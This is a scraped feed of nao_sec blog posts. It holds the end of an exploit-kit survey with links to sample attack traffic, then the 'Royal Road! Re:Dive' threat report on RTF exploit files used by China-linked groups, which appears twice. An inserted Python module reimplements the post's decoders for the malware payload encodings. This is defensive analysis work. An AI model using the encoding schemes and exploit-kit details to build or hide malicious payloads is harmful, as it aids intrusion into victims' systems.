But its essence hasn’t changed at all.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/underminer.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/underminer.saz">here</a>.</p> <h3 id="bottle-exploit-kit">Bottle Exploit Kit</h3> <p>Bottle is an Exploit Kit that appeared in 2019. It is an extremely rare Exploit Kit that targets only Japan. It is used to deliver its own malware, called Cinobi.</p> <p>It is one of the most active Exploit Kits in Japan. It had not been observed since November 2020, but it was revived in April 2021. It is also worth noting that, unlike other Exploit Kits, it exploits CVE-2020-1380 as well as CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details.</p> <p><img src="https://nao-sec.org/assets/2021-04-16/bottle.png" alt="" /></p> <p>Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/bottle.saz">here</a>.</p> <h3 id="magnitude-exploit-kit">Magnitude Exploit Kit</h3> <p>Magnitude is one of the oldest Exploit Kits still in existence. It has been observed only in certain countries/regions, such as South Korea and Taiwan, and its details have not been reported much.</p> <p>Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving.</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">One more: <a href="https://twitter.com/hashtag/MagnitudeEK?src=hash&amp;ref_src=twsrc%5Etfw">#MagnitudeEK</a> <a href="https://t.co/pOuIZzAPZG">pic.twitter.com/pOuIZzAPZG</a></p>&mdash; Jérôme Segura (@jeromesegura) <a href="https://twitter.com/jeromesegura/status/1382395637480656896?ref_src=twsrc%5Etfw">April 14, 2021</a></blockquote> <h2 id="finally">Finally</h2> <p>Drive-by Download attacks are still observed in 2021. They have nothing to do with most people. 
As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks will continue to exist as long as Internet Explorer does.</p> <h2 id="references">References</h2> <p>[1] <a href="https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf">https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf</a><br /> [2] <a href="https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit">https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit</a><br /> [3] <a href="https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/">https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/</a><br /> [4] <a href="http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf">http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf</a></p>
  57. Royal Road! Re:Dive

    Mon, 04 Jan 2021 15:00:00 -0000

    Abstract

    We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented it at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020.

    Previous Blog

    Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF files generated by it have various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”.

    1. Exploiting a vulnerability in Microsoft Office Equation Editor
    2. Containing an object named “8.t”

    However, some RTF files are likely to be related to Royal Road even though they don’t meet the second condition. For classification purposes, we refer to these as “Related Samples”. In reality, these may also be RTF files generated by Royal Road, but the truth is known only to the attacker. Based on our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below.

    Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group aliases are written for reference. Strictly speaking, these can be different. For example, TA428 and Pirate Panda are not exactly equivalent. 
    1. Temp.Tick (BRONZE BUTLER, RedBaldKnight)
    2. Temp.Conimes (Goblin Panda, Cycldek)
    3. Temp.Periscope (Leviathan, APT40)
    4. Temp.Trident (Dagger Panda, IceFog)
    5. Tonto (Karma Panda, CactusPete, LoneRanger)
    6. TA428 (Pirate Panda)
    7. Rancor

    Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common.

    Updates

    It’s been a year since we introduced Royal Road. In the meantime, RTF files believed to have been generated by Royal Road have been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates.

    The RTF file generated by Royal Road contains encoded malware. It is decoded by shellcode after exploitation. In our previous blog, we introduced the following 5 encodings.

    1. 4D 5A 90 00 (not encoded)
    2. F2 A3 20 72
    3. B2 A6 6D FF
    4. B0 74 77 46
    5. B2 5A 6F 00

    Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used new encodings. These are the following 2 encodings.

    6. A9 A4 6E FE

    This encoding can be decoded with code like the following (enc_data is the raw bytes of the encoded object):

        # each byte: XOR with 0x7b, add 0x7b, keep the low 8 bits
        dec_data = []
        for i in range(len(enc_data)):
            dec_data.append(((enc_data[i] ^ 0x7b) + 0x7b) % 256)

    7. 94 5F DA D8

    This encoding can be decoded with code like the following:

        # 32-bit feedback shift register; only bits 0, 3 and 29 feed back, so
        # masking to 32 bits keeps the key from growing without changing the output
        dec_data = []
        xor_key = 1387678300
        for i in range(len(enc_data)):
            for _ in range(7):
                x0 = (xor_key & 0x20000000) == 0x20000000
                x1 = (xor_key & 8) == 8
                x2 = xor_key & 1
                x3 = 1 + (x0 ^ x1 ^ x2)
                xor_key = ((xor_key + xor_key) + x3) & 0xFFFFFFFF
            dec_data.append(enc_data[i] ^ (xor_key % 256))

    Our tool for decoding Royal Road encoded objects is already available on GitHub. It also supports the above new encodings.

    https://github.com/nao-sec/rr_decoder

    New Attack Groups

    As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020. 
    1. Temp.Conimes
    2. Tonto
    3. TA428
    4. Naikon
    5. Higaisa
    6. Vicious Panda
    7. FunnyDream
    8. TA410

    Of these, we have already reported on attack groups 1-3 in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia. TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan); please refer to them.

    For Naikon, CheckPoint Research reported [6], but unfortunately we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8).

    Higaisa

    Higaisa is an attack group that seems to have been active since at least around 2016. It primarily targets North Korea-related organizations and is believed to aim at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. Blogs have been written by Tencent and Positive Technologies so far [7][8][9], and they attribute the group to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and reported that it might belong to China.

    We observed an attack by Higaisa using Royal Road in March 2020. The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018.

    Vicious Panda

    Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia, such as Russia, Mongolia, and Ukraine. We observed an attack using Royal Road by Vicious Panda in March 2020. It has been reported to execute malware similar to Enfal and BYEBY.

    FunnyDream

    FunnyDream is an attack group that is said to have been active since around 2018. 
    It is said to belong to China and targets Southeast Asia, such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream. We observed attacks by FunnyDream from March to May 2020. Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decodes its config using two numeric values and communicates with the C&C server over its own protocol using Blowfish.

    TA410

    TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. Reports have been published by Proofpoint [15][16][17]; the group mainly targets the public sector in the US. It uses malware called LookBack and FlowCloud. We observed an attack by TA410 in October 2020. FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud v4 and v5 have been reported, but the FlowCloud we observed this time was similar to v4.

    Attack case against Japan

    In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), other attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of an attack on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us…

    The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to an email. These RTF files did not contain an 8.t object, but they did contain a related object. This is the malware encoded with the 4th encoding (B0 74 77 46) shown above. The overall picture of the attack is as follows. The malware executed was an unknown RAT. We call it XLBug RAT because of the characteristics left in it. The RAT holds information such as the C&C server encoded with Base64 and XOR. The following commands are implemented in XLBug RAT. 
    - Get directory information
    - Get file information
    - Get computer information
    - Execute file
    - Upload file
    - Download file
    - Rename file
    - Delete file
    - Delete itself

    The naming convention and encoding of the encoded object contained in the RTF are similar to those of TA428. However, we cannot say that this was a TA428 attack.

    Relationship

    In the previous blog, we summarized the characteristics of attack groups that use Royal Road and used them to divide the attack groups into two groups. However, by 2020, those characteristics are almost meaningless: they have been standardized or removed. It’s not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close. We do not classify further, but if you have any comments please let us know.

    Yara Rule

    The GitHub repository we shared in the previous blog is still being updated.

    https://github.com/nao-sec/yara_rules

    IOC

    The IOC sheet shared in the previous blog is still being updated.

    https://nao-sec.org/jsac2020_ioc.html

    Tool

    Our tool for decoding objects encoded by Royal Road is still being updated.

    https://github.com/nao-sec/rr_decoder

    Wrap-Up

    The attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but attacks by other attack groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. An attack on Japan has also been observed, and we were unable to attribute it to a known attack group. The use of Royal Road by these unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, that appear to share tools among multiple targeted attack groups. We should continue to pay close attention to these tool-sharing cases.

    Acknowledgments

    “nao_sec” is an independent research team that does not belong to any company. 
    Individuals belong to their respective companies and engage in research there, but the activities of nao_sec maintain their independence from each company. We are grateful to all of you who cooperated with our research activities every day.

    References

    [1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
    [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf
    [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger
    [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas
    [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager
    [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/
    [7] Tencent, “APT攻击组织”黑格莎(Higaisa)”攻击活动披露”, https://s.tencent.com/research/report/836.html
    [8] Tencent, ““Higaisa(黑格莎)”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html
    [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/
    [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report
    [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon
    [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/
    [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
    [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/
    [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks
    [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals
    [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
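The two new Royal Road object encodings that this post introduces (A9 A4 6E FE and 94 5F DA D8), as an added example that is not nao_sec's code or the rr_decoder tool. It reimplements both decoders from the post's snippets (the 0x7b constant, the 1387678300 seed and the 7-round feedback loop), adds a table keyed on the first 4 bytes of an extracted object so it can be routed to the right decoder, and checks that the result starts with an MZ header, since each signature listed in the post is what that header looks like once encoded. The encoders, the `SIGNATURES` table, the `decode_object` wrapper and the sample payload are constructed here for the example; decoders for the four older encodings are not shown in the post, so those are recognised by signature only.

```python
"""Decoders for the two Royal Road object encodings introduced in the post.

Added example, not nao_sec's rr_decoder. Constants come from the post's own
snippets; the signature table and MZ check are constructed for this example.
"""
from typing import Callable, Dict, Iterator, Optional, Tuple

# The embedded payload is a PE file, so a correct decode starts with this header.
MZ_HEADER = b"MZ\x90\x00"


def decode_xor_add(enc: bytes) -> bytes:
    """Encoding 'A9 A4 6E FE': each byte is ((b ^ 0x7b) + 0x7b) mod 256."""
    return bytes(((b ^ 0x7B) + 0x7B) & 0xFF for b in enc)


def encode_xor_add(plain: bytes) -> bytes:
    """Inverse of decode_xor_add, constructed here to build test objects."""
    return bytes(((b - 0x7B) & 0xFF) ^ 0x7B for b in plain)


def lfsr_keystream(length: int, seed: int = 1387678300) -> Iterator[int]:
    """Keystream for encoding '94 5F DA D8'.

    The key is shifted left 7 times per output byte; the value shifted in is
    1 + (bit29 ^ bit3 ^ bit0) of the current key. Only bits 0..29 are read,
    so masking to 32 bits gives the same bytes as the post's unbounded
    Python integer while keeping the key from growing without limit.
    """
    key = seed
    for _ in range(length):
        for _ in range(7):
            x0 = (key >> 29) & 1
            x1 = (key >> 3) & 1
            x2 = key & 1
            key = ((key << 1) + 1 + (x0 ^ x1 ^ x2)) & 0xFFFFFFFF
        yield key & 0xFF


def decode_lfsr(enc: bytes) -> bytes:
    """Encoding '94 5F DA D8': XOR each byte with the keystream above."""
    return bytes(b ^ k for b, k in zip(enc, lfsr_keystream(len(enc))))


encode_lfsr = decode_lfsr  # XOR with a keystream is its own inverse


# First 4 bytes of an encoded object -> (label used in the post, decoder).
# The post does not show decoders for encodings 2-5, so those are None here.
Decoder = Optional[Callable[[bytes], bytes]]
SIGNATURES: Dict[bytes, Tuple[str, Decoder]] = {
    bytes.fromhex("4D5A9000"): ("4D 5A 90 00 (not encoded)", lambda b: b),
    bytes.fromhex("F2A32072"): ("F2 A3 20 72", None),
    bytes.fromhex("B2A66DFF"): ("B2 A6 6D FF", None),
    bytes.fromhex("B0747746"): ("B0 74 77 46", None),
    bytes.fromhex("B25A6F00"): ("B2 5A 6F 00", None),
    bytes.fromhex("A9A46EFE"): ("A9 A4 6E FE", decode_xor_add),
    bytes.fromhex("945FDAD8"): ("94 5F DA D8", decode_lfsr),
}


def identify_encoding(obj: bytes) -> Optional[str]:
    """Return the post's label for the object's encoding, or None if unknown."""
    entry = SIGNATURES.get(obj[:4])
    return entry[0] if entry else None


def decode_object(obj: bytes) -> bytes:
    """Pick the decoder from the signature and verify the result is a PE."""
    entry = SIGNATURES.get(obj[:4])
    if entry is None:
        raise ValueError("unknown Royal Road encoding: %s" % obj[:4].hex())
    label, decoder = entry
    if decoder is None:
        raise NotImplementedError("decoder for %s is not shown in the post" % label)
    dec = decoder(obj)
    if not dec.startswith(MZ_HEADER):
        raise ValueError("decoded object does not start with an MZ header")
    return dec


if __name__ == "__main__":
    # Constructed sample: a fake PE stub, encoded with each of the new schemes.
    payload = MZ_HEADER + b"\x03\x00\x00\x00" + b"\x90" * 8
    for enc in (encode_xor_add(payload), encode_lfsr(payload)):
        print(identify_encoding(enc), decode_object(enc) == payload)
```

For a real object carved out of an RTF, `decode_object(open(path, "rb").read())` is the whole workflow; the MZ check catches the common failure where the wrong scheme was picked or the object was carved at the wrong offset, which otherwise produces silent garbage.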
    <p><img src="https://nao-sec.org/assets/2021-01-05/00.png" alt="" /></p> <h2 id="abstract">Abstract</h2> <p>We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented it at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020.</p> <h2 id="previous-blog">Previous Blog</h2> <p>Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF files generated by it have various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”.</p> <ol> <li>Exploiting a vulnerability in Microsoft Office Equation Editor</li> <li>Containing an object named “8.t”</li> </ol> <p>However, some RTF files are likely to be related to Royal Road even though they don’t meet the second condition. For classification purposes, we refer to these as “Related Samples”. In reality, these may also be RTF files generated by Royal Road, but the truth is known only to the attacker. Based on our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below.</p> <p>Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group aliases are written for reference. Strictly speaking, these can be different. 
For example, TA428 and Pirate Panda are not exactly equivalent.</p> <ol> <li>Temp.Tick (BRONZE BUTLER, RedBaldKnight)</li> <li>Temp.Conimes (Goblin Panda, Cycldek)</li> <li>Temp.Periscope (Leviathan, APT40)</li> <li>Temp.Trident (Dagger Panda, IceFog)</li> <li>Tonto (Karma Panda, CactusPete, LoneRanger)</li> <li>TA428 (Pirate Panda)</li> <li>Rancor</li> </ol> <p>Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/01.png" alt="" /></p> <h2 id="updates">Updates</h2> <p>It’s been a year since we introduced Royal Road. In the meantime, RTF files believed to have been generated by Royal Road have been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates.</p> <p>The RTF file generated by Royal Road contains encoded malware. It is decoded by shellcode after exploitation. In our previous blog, we introduced the following 5 encodings.</p> <ol> <li>4D 5A 90 00 (not encoded)</li> <li>F2 A3 20 72</li> <li>B2 A6 6D FF</li> <li>B0 74 77 46</li> <li>B2 5A 6F 00</li> </ol> <p>Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used new encodings. 
These are the following 2 encodings.</p> <ol start="6"> <li>A9 A4 6E FE</li> </ol> <p><img src="https://nao-sec.org/assets/2021-01-05/02.png" alt="" /></p> <p>This encoding can be decoded with code like the following (enc_data is the raw bytes of the encoded object):</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># each byte: XOR with 0x7b, add 0x7b, keep the low 8 bits
dec_data = []
for i in range(len(enc_data)):
    dec_data.append(((enc_data[i] ^ 0x7b) + 0x7b) % 256)
</code></pre></div></div> <ol start="7"> <li>94 5F DA D8</li> </ol> <p><img src="https://nao-sec.org/assets/2021-01-05/03.png" alt="" /></p> <p>This encoding can be decoded with code like the following:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># 32-bit feedback shift register; only bits 0, 3 and 29 feed back, so
# masking to 32 bits keeps the key from growing without changing the output
dec_data = []
xor_key = 1387678300
for i in range(len(enc_data)):
    for _ in range(7):
        x0 = (xor_key &amp; 0x20000000) == 0x20000000
        x1 = (xor_key &amp; 8) == 8
        x2 = xor_key &amp; 1
        x3 = 1 + (x0 ^ x1 ^ x2)
        xor_key = ((xor_key + xor_key) + x3) &amp; 0xFFFFFFFF
    dec_data.append(enc_data[i] ^ (xor_key % 256))
</code></pre></div></div> <p>Our tool for decoding Royal Road encoded objects is already available on GitHub. 
It also supports the above new encodings.</p> <p><a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a></p> <h2 id="new-attack-groups">New Attack Groups</h2> <p>As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020.</p> <ol> <li>Temp.Conimes</li> <li>Tonto</li> <li>TA428</li> <li>Naikon</li> <li>Higaisa</li> <li>Vicious Panda</li> <li>FunnyDream</li> <li>TA410</li> </ol> <p>Of these, we have already reported on attack groups 1-3 in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia.</p> <p>TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan); please refer to them.</p> <p>For Naikon, CheckPoint Research reported [6], but unfortunately we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8).</p> <h3 id="higaisa">Higaisa</h3> <p>Higaisa is an attack group that seems to have been active since at least around 2016. It primarily targets North Korea-related organizations and is believed to aim at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT.</p> <p>Blogs have been written by Tencent and Positive Technologies so far [7][8][9], and they attribute the group to (South) Korea. 
However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and reported that it might belong to China.</p> <p>We observed an attack by Higaisa using Royal Road in March 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/04.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/05.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/06.png" alt="" /></p> <p>The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/07.png" alt="" /></p> <h3 id="vicious-panda">Vicious Panda</h3> <p>Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia, such as Russia, Mongolia, and Ukraine.</p> <p>We observed an attack using Royal Road by Vicious Panda in March 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/08.png" alt="" /></p> <p>It has been reported to execute malware similar to Enfal and BYEBY.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/09.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/10.png" alt="" /></p> <h3 id="funnydream">FunnyDream</h3> <p>FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia, such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream.</p> <p>We observed attacks by FunnyDream from March to May 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/11.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/12.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/13.png" alt="" /></p> <p>Chinoxy is a RAT that has been used by FunnyDream since around 2018. 
It decoded the config using two numeric data and communicates with the C&amp;C server using its original protocol using Blowfish.</p> <h3 id="ta410">TA410</h3> <p>TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. The report has been published by Proofpoint [15][16][17] and is mainly targeted at public sector in the US. It uses malware called LockBack and FlowCloud.</p> <p>We observed an attack by TA410 in October 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/15.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/16.png" alt="" /></p> <p>FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud has been reported to be v4 and v5, but the FlowCloud we observed at this time was similar to v4.</p> <h2 id="attack-case-against-japan">Attack case against Japan</h2> <p>In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of attacks on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us…</p> <p>The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to the email.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/18.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/19.png" alt="" /></p> <p>These RTF files did not contain an 8.t object, however did contain an associated object. This is the malware encoded by the 4th (B0 74 77 46) encoding shown above.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/20.png" alt="" /></p> <p>The overall picture of the attack is as follows.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/21.png" alt="" /></p> <p>The malware executed was an unknown RAT. 
We call it XLBug RAT because of a characteristic artifact left in the binary. The RAT stores its configuration, including the C&amp;C server address, encoded with Base64 and XOR.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/22.png" alt="" /></p> <p>The following commands are implemented in XLBug RAT.</p> <ul> <li>Get directory information</li> <li>Get file information</li> <li>Get computer information</li> <li>Execute file</li> <li>Upload file</li> <li>Download file</li> <li>Rename file</li> <li>Delete file</li> <li>Delete itself</li> </ul> <p>The naming convention and encoding of the encoded object in the RTF are similar to those used by TA428. However, we cannot say that this was a TA428 attack.</p> <h2 id="relationship">Relationship</h2> <p>In the previous blog, we summarized the characteristics of the attack groups that use Royal Road and used them to divide the groups into two clusters. By 2020, however, those characteristics have become almost meaningless: they have been standardized or removed, so grouping is no longer as easy as it used to be. In the first place, groups sharing Royal Road should be close to each other. We do not classify them further here, but if you have any comments, please let us know.</p> <h2 id="yara-rule">Yara Rule</h2> <p>The GitHub repository we shared in the previous blog is still being updated.</p> <p><a href="https://github.com/nao-sec/yara_rules">https://github.com/nao-sec/yara_rules</a></p> <h2 id="ioc">IOC</h2> <p>The IOC sheet shared in the previous blog is still being updated.</p> <p><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></p> <h2 id="tool">Tool</h2> <p>The tool for decoding objects encoded by Royal Road (rr_decoder) is still being updated.</p> <p><a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a></p> <h2 id="wrap-up">Wrap-Up</h2> <p>Attacks using Royal Road have decreased compared to 2019 but are still ongoing. 
There are many attacks by TA428 and Tonto, but attacks by other groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed.</p> <p>We also observed attacks on Japan that we could not attribute to a known attack group. The use of Royal Road by such unidentified groups is expected to continue.</p> <p>Besides Royal Road, there are other cases, such as the Tmanger family, where tools appear to be shared among multiple targeted attack groups. We should continue to pay close attention to such tool-sharing cases.</p> <h2 id="acknowledgments">Acknowledgments</h2> <p>nao_sec is an independent research team that does not belong to any company. Its members belong to various companies and conduct research there, but nao_sec’s activities remain independent of those companies. We are grateful to everyone who cooperates with our research activities every day.</p> <hr /> <h2 id="references">References</h2> <p>[1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html<br /> [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf<br /> [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger<br /> [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas<br /> [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager<br /> [6] Check Point Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/<br /> [7] Tencent, “APT攻击组织“黑格莎(Higaisa)”攻击活动披露” (Disclosure of attack activity by the APT group “Higaisa”), https://s.tencent.com/research/report/836.html<br /> [8] Tencent, ““Higaisa(黑格莎)”组织近期攻击活动报告” (Report on recent attack activity of the “Higaisa” group), https://s.tencent.com/research/report/895.html<br /> [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa” (COVID-19 and New Year greetings: examining the Higaisa group’s tools), https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/<br /> [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート” (Crafty Panda targeted attack analysis report), https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report<br /> [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon<br /> [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/<br 